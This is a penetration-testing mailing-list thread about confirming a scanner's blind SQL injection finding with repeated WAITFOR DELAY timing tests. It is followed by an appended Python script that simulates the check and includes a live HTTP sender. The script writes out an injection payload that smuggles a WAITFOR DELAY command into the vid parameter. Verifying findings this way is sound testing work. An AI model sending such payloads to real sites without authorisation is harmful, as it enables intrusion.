Penetration Testing mailing list archives
Re: Checking for SQL Injection
From: "kevin horvath" <kevin.horvath () gmail com>
Date: Wed, 3 Sep 2008 16:21:07 -0400
Just to clarify, when I say delay I meant what the tool is using for a WAITFOR DELAY. That is, of course, if this is what it's using for its blind SQL injection. So if it's using a delay of 10 seconds, you should verify by doing the same command and seeing that you don't get a response until the 10-second delay is over. Also to clarify, you need to manually do this multiple times if you're doing this over a WAN, to make sure latency isn't an issue, since this is a time-based attack.

Good luck.

On Wed, Sep 3, 2008 at 4:17 PM, kevin horvath <kevin.horvath () gmail com> wrote:
A couple of points here. It could be using a time-based injection (WAITFOR DELAY). It's possible that it's injecting this into one of the vid parameters, but you would need to decode/decrypt these parameters to see (or look at the tool and see what and how it's doing its injecting). It's not doing it on the basic authorization, so it must be the vid as the injection point. But to verify this you need to know what the delay is and verify that it is working by doing these multiple times (to take into account any delay over the WAN). So you should do this test manually to see if this is the case. It could also be comparing responses for differences, but you need to verify this manually and try your own injection and compare to see if there is any difference (note Burp Suite is an excellent tool for this).

Kevin

On Mon, Sep 1, 2008 at 4:35 AM, GT GERONIMO, Frederick Joseph B. <fbgeronimo () globetel com ph> wrote:

Hello,

I ran a tool to verify if a website had SQL Injection. The tool detected a Blind SQL Injection vulnerability. I have pasted the request and response below. Would you say that the tool's evaluation is accurate? Is there anything that the web application can be doing to make this a false positive? Thanks.
HTTP REQUEST
============
GET /prototype03/vulnerable.php?vid=zJrt&act=viewed&page=0.01 HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: www.victim.com
Authorization: Basic dTI0Y29tcGg6PCEzIzw3PjlBQnVu
Cookie: PHPSESSID=b4499547c0c4f399ba649181d5e67f5c;vid11=6512bd43d9caa6e02c990b0a82652dca;vid2=c81e728d9d4c2f636f067f89cc14862c;vid4=a87ff679a2f3e71d9181a67b7542122c;vid8=c9f0f895fb98ab9159f51fd0297e236d;vid9=45c48cce2e2d7fbdea1afc51c7c6ad26;vid7=8f14e45fceea167a5a36dedd4bea2543
Connection: Close
Pragma: no-cache

HTTP RESPONSE
=============
HTTP/1.1 200 OK
Date: Fri, 29 Aug 2008 10:00:08 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html

------------------------------------------------------------------------
This list is sponsored by: Cenzic
Top 5 Common Mistakes in Securing Web Applications
Get 45 Min Video and PPT Slides
www.cenzic.com/landing/securityfocus/hackinar
------------------------------------------------------------------------
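The manual check Kevin describes, written out as an added example (this is not code from the thread or from the scanner Frederick ran). It sends the scanner's kind of WAITFOR DELAY probe several times, interleaved with baseline requests, and only confirms the finding if every probe is slower than every baseline by most of the requested delay, so a WAN latency spike cannot fake the result. The target is a constructed simulation so the script runs offline; the payload value for vid, the 10-second delay and the www.victim.com URL in live_sender() are assumptions for illustration (the real vid value "zJrt" looks encoded, so a live test would need to wrap the payload the way the application expects).

```python
"""Manual confirmation of a time-based (WAITFOR DELAY) blind SQLi finding.

Added example for this thread, not code from the original posts or from the
scanner in question. The target is a constructed simulation so the script
runs offline; live_sender() shows the real HTTP round trip you would swap in.
"""
import random
import statistics
import time
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable, Dict, List, Optional

Sender = Callable[[str], float]  # takes a vid value, returns round-trip seconds

# Assumed probe values. The real vid ("zJrt") looks encoded, so a live test
# has to wrap the payload in whatever encoding the application expects.
BASE_VID = "zJrt"
DELAY_SECONDS = 10
DELAY_VID = f"zJrt'; WAITFOR DELAY '0:0:{DELAY_SECONDS}'--"


def simulated_target(vulnerable: bool, base_rtt: float, jitter: float,
                     spikes: Optional[Dict[int, float]] = None,
                     seed: int = 1) -> Sender:
    """Constructed stand-in for www.victim.com: base latency, uniform WAN
    jitter, and optional one-off latency spikes keyed by request number."""
    rng = random.Random(seed)
    spikes = spikes or {}
    calls = [0]

    def send(vid: str) -> float:
        rtt = base_rtt + rng.uniform(0, jitter) + spikes.get(calls[0], 0.0)
        calls[0] += 1
        if vulnerable and "WAITFOR DELAY" in vid.upper():
            rtt += DELAY_SECONDS  # the database really sleeps
        return rtt

    return send


def live_sender(url_prefix: str, headers: Dict[str, str]) -> Sender:
    """Real sender: GET url_prefix + urlencoded vid and time the round trip.
    A 4xx/5xx (e.g. a SQL error page) is still timed; only the delay matters."""
    def send(vid: str) -> float:
        req = urllib.request.Request(url_prefix + urllib.parse.quote(vid, safe=""),
                                     headers=headers)
        start = time.monotonic()
        try:
            with urllib.request.urlopen(req, timeout=DELAY_SECONDS * 3) as resp:
                resp.read()
        except urllib.error.HTTPError as err:
            err.read()
        return time.monotonic() - start

    return send


def single_shot_verdict(send: Sender, delay: float = DELAY_SECONDS) -> bool:
    """What a careless check does: one baseline, one probe, flag if the probe
    took most of the requested delay longer. A single WAN spike fools it."""
    base = send(BASE_VID)
    probe = send(DELAY_VID)
    return probe - base >= 0.8 * delay


def repeated_verdict(send: Sender, samples: int = 5,
                     delay: float = DELAY_SECONDS) -> Dict[str, object]:
    """The advice in the thread: repeat baseline and probe requests, interleaved,
    and confirm only if the slowest baseline is still faster than the fastest
    probe by most of the requested delay. Jitter would then have to hit every
    probe and no baseline to produce a false positive."""
    base: List[float] = []
    probe: List[float] = []
    for _ in range(samples):
        base.append(send(BASE_VID))
        probe.append(send(DELAY_VID))
    gap = min(probe) - max(base)
    return {
        "baseline_median": round(statistics.median(base), 3),
        "probe_median": round(statistics.median(probe), 3),
        "min_gap": round(gap, 3),
        "confirmed": gap >= 0.8 * delay,
    }


if __name__ == "__main__":
    # Constructed case 1: not injectable, but a 12 s WAN hiccup lands on the
    # first probe. The single-shot check calls it vulnerable; repeating does not.
    print("single shot, not vulnerable:",
          single_shot_verdict(simulated_target(False, 0.3, 0.2, spikes={1: 12.0})))
    print("repeated, not vulnerable:",
          repeated_verdict(simulated_target(False, 0.3, 0.2, spikes={1: 12.0})))
    # Constructed case 2: genuinely injectable, same WAN conditions.
    print("repeated, vulnerable:", repeated_verdict(simulated_target(True, 0.3, 0.2)))
```

For a live run, build the sender with the request shown in the post, for example live_sender("http://www.victim.com/prototype03/vulnerable.php?act=viewed&page=0.01&vid=", {"Authorization": "Basic ...", "Cookie": "PHPSESSID=..."}), and pass it to repeated_verdict(). The 0.8 factor leaves room for the server to return slightly early; if the gap hovers near zero on a vulnerable-looking target, the injection point or encoding is probably wrong rather than the latency.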
Current thread:
- Re: Checking for SQL Injection, (continued)
- Re: Checking for SQL Injection Serg B (Sep 03)
- RE: Checking for SQL Injection Basha, Arif (Sep 03)
- Re: Checking for SQL Injection Bruno Guerreiro Diniz (Sep 03)
- Re: Checking for SQL Injection david lodge (Sep 10)
- Re: Checking for SQL Injection Glenn Wilkinson (Sep 12)
- Re: Checking for SQL Injection Jorge L. Vazquez (Sep 13)
- Re: Checking for SQL Injection p4ssion (Sep 14)
- RE: Checking for SQL Injection Basha, Arif (Sep 03)
- Re: Checking for SQL Injection Serg B (Sep 03)
- Re: Checking for SQL Injection natron (Sep 03)
- Re: Checking for SQL Injection kevin horvath (Sep 03)